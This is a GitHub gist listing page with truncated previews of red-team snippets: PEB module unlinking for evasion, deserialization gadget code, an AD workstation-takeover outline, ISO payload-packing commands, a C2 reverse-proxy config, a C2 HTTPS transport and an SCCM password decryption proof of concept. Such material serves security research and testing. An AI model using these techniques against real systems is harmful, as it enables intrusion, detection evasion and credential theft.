Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
  • Binary-Offensive.com
  • Poland
  • Twitter @mariuszbit
View GitHub Profile
@mgeeky
mgeeky / PEB.cs
Created Oct 24, 2022 — forked from Sadulisten/PEB.cs
Unlinking Module from PEB with c# (64bit tested only)
View PEB.cs
public unsafe static bool UnlinkModuleFromPeb(IntPtr hModule)
{
if (hModule == IntPtr.Zero) return false;
PEB* peb = Get_PEB();
if (peb == null) return false;
LIST_ENTRY* CurrentEntry = peb->Ldr->InLoadOrderModuleList.Flink;
Debug.Assert(CurrentEntry != null);
View gist:a7dd62dd86205ad19c7365037508bb76
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
@mgeeky
mgeeky / fork.c
Created Sep 25, 2022 — forked from Cr4sh/fork.c
fork() for Windows
View fork.c
/*
* fork.c
* Experimental fork() on Windows. Requires NT 6 subsystem or
* newer.
*
* Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
@mgeeky
mgeeky / Workstation-Takeover.md
Created Sep 15, 2022 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

View gist:82d6abe0508ae81f107689864fb5dfc0
# Pack macro-enabled doc to ISO
py PackMyPayload.py Resume1337.xlsm test11.iso
# Apply MOTW on that ISO
Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
# Mount it
Mount-DiskImage -ImagePath test11.iso
@mgeeky
mgeeky / AMSITools.psm1
Created Aug 5, 2022 — forked from mgraeber-rc/AMSITools.psm1
Get-AMSIEvent and Send-AmsiContent are helper functions used to validate AMSI ETW events. Note: because this script contains the word AMSI, it will flag most AV engines. Add an exception on a test system accordingly in order to get this to work.
View AMSITools.psm1
filter Send-AmsiContent {
<#
.SYNOPSIS
Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.
Author: Matt Graeber
Company: Red Canary
.DESCRIPTION
@mgeeky
mgeeky / Caddyfile
Created Aug 1, 2022 — forked from byt3bl33d3r/Caddyfile
Caddyfile reverse proxy example for C2 platforms
View Caddyfile
{
# This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this.
acme_ca https://acme-staging-v02.api.letsencrypt.org/directory
}
(proxy_upstream) {
# Enable access logging to STDOUT
log
# This is our list of naughty client User Agents that we don't want accessing our C2
@mgeeky
mgeeky / transport_https.c
Created Jul 11, 2022 — forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
View transport_https.c
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
#ifdef TRANSPORT_HTTP
HANDLE hConnect = NULL;
HANDLE hSession = NULL;
HANDLE hRequest = NULL;
DWORD HttpFlags = 0;
LPVOID RespBuffer = NULL;
@mgeeky
mgeeky / howToModifyOvaFile.md
Created Jul 5, 2022 — forked from afdevries/howToModifyOvaFile.md
how to modify .ova file on linux/Mac using terminal....export vm (OVF 1.0) from virtualbox, then modify some tag and hash value for import vm to ESXi
View howToModifyOvaFile.md

extract ova files from an archive

$ tar -xvf vmName.ova

modify ovf for some invalid tag

$ vi vmName.ovf
@mgeeky
mgeeky / sccmdecryptpoc.cs
Created Jul 3, 2022 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
View sccmdecryptpoc.cs
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program